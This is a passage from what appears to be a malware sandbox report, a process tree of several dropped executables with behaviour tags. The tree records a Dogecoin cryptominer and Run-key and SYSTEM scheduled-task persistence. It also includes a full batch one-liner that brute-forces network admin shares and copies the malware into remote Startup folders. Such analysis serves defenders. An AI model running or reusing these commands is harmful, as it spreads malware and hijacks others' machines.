        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4984,i,15629971779607784014,12583318137926845863,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4992 /prefetch:8
        6⤵
        
        PID:7596
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:8176
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7fffc06fb078,0x7fffc06fb084,0x7fffc06fb090
        6⤵
        
        PID:6372
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2692,i,8117284071451647522,5566731806384404440,262144 --variations-seed-version --mojo-platform-channel-handle=2660 /prefetch:2
        6⤵
        
        PID:7332
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1812,i,8117284071451647522,5566731806384404440,262144 --variations-seed-version --mojo-platform-channel-handle=2956 /prefetch:11
        6⤵
        
        PID:7532
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1948,i,8117284071451647522,5566731806384404440,262144 --variations-seed-version --mojo-platform-channel-handle=2952 /prefetch:13
        6⤵
        
        PID:3344
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3616,i,8117284071451647522,5566731806384404440,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:800
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3620,i,8117284071451647522,5566731806384404440,262144 --variations-seed-version --mojo-platform-channel-handle=3800 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2100
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:7208
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:1236
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7fffc06fb078,0x7fffc06fb084,0x7fffc06fb090
        6⤵
        
        PID:7312
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2640,i,7496546977912416565,3376107970790111230,262144 --variations-seed-version --mojo-platform-channel-handle=2632 /prefetch:2
        6⤵
        
        PID:4664
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1832,i,7496546977912416565,3376107970790111230,262144 --variations-seed-version --mojo-platform-channel-handle=2872 /prefetch:11
        6⤵
        
        PID:7552
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2072,i,7496546977912416565,3376107970790111230,262144 --variations-seed-version --mojo-platform-channel-handle=3100 /prefetch:13
        6⤵
        
        PID:1140
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3604,i,7496546977912416565,3376107970790111230,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6636
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3620,i,7496546977912416565,3376107970790111230,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6472
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\va1ng" & exit
        5⤵
        
        PID:5368
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:2660
- - C:\Users\Admin\AppData\Local\Temp\a\StCl.exe
    "C:\Users\Admin\AppData\Local\Temp\a\StCl.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3772
- - C:\Users\Admin\AppData\Local\Temp\a\untitled2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\untitled2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2260
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im os-setup-service.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5536
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ffmpeg.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5496
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im python.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5396
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im browser_broker.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5632
  - - C:\Users\Admin\AppData\Local\Temp\a\minerlol\cpuminer-avx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\minerlol\cpuminer-avx.exe" -a minotaurx -o stratum+tcp://minotaurx.na.mine.zpool.ca:7019 -u DMgypy9jqhGHL1TbHGHrBnEZxoFsM3tGiy -p c=DOGE
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2404
- - C:\Users\Admin\AppData\Local\Temp\a\random.exe
    "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5844
- - C:\Users\Admin\AppData\Local\Temp\a\Bjkm5hE.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Bjkm5hE.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:5692
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Drops file in Windows directory
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:4284
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x84,0x7fffbd09cc40,0x7fffbd09cc4c,0x7fffbd09cc58
        5⤵
        
        PID:6060
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1824 /prefetch:2
        5⤵
        
        PID:5208
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2112 /prefetch:3
        5⤵
        
        PID:5980
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2348 /prefetch:8
        5⤵
        
        PID:4720
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3160 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5272
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3204 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5344
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4468 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5932
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4220,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4160 /prefetch:8
        5⤵
        
        PID:6092
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4412,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4704 /prefetch:8
        5⤵
        
        PID:2328
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4872,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4900 /prefetch:8
        5⤵
        
        PID:5368
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,16309489934959908034,17458525272456785641,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4684 /prefetch:8
        5⤵
        
        PID:2016
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:3368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:8088
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\myuaa" & exit
      4⤵
      PID:5412
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:2996
- - C:\Users\Admin\AppData\Local\Temp\a\silk.exe
    "C:\Users\Admin\AppData\Local\Temp\a\silk.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3956
  - - C:\Users\Admin\AppData\Local\Temp\is-NA135.tmp\silk.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-NA135.tmp\silk.tmp" /SL5="$30428,5943295,56832,C:\Users\Admin\AppData\Local\Temp\a\silk.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:5592
    - - C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\olddataeraser19.exe
        
        "C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\olddataeraser19.exe" -i
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3720
- - C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe
    "C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5140
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5724
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
  - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5824
  - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
      "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1528
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3584
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4608
    - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4764
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4504
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:6060
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5384
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5280
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5716
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3024
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        5⤵
        Power Settings
        System Location Discovery: System Language Discovery
        
        PID:4636
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5672
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5500
      - C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        6⤵
        Power Settings
        
        PID:5496
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1503& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
        5⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:980
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
        6⤵
        Network Service Discovery
        
        PID:6924
        
        C:\Windows\SysWOW64\net.exe
        
        net view
        7⤵
        Discovers systems in the same network
        
        PID:5556
        
        C:\Windows\SysWOW64\find.exe
        
        find /i "\\"
        7⤵
        
        PID:7344
        
        C:\Windows\SysWOW64\ARP.EXE
        
        arp -a
        7⤵
        Network Service Discovery
        
        PID:4152
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " 1"
        7⤵
        
        PID:7688
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c set str_
        6⤵
        
        PID:6716
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "
        6⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\net.exe
        
        net view \\10.127.0.1
        7⤵
        Discovers systems in the same network
        
        PID:8128
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " "
        7⤵
        
        PID:7388
      - C:\Windows\SysWOW64\net.exe
        
        net use * /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:7420
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:460
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:2160
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7092
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6108
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7544
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7868
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1732
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7796
        
        C:\Windows\SysWOW64\xcopy.exe
        
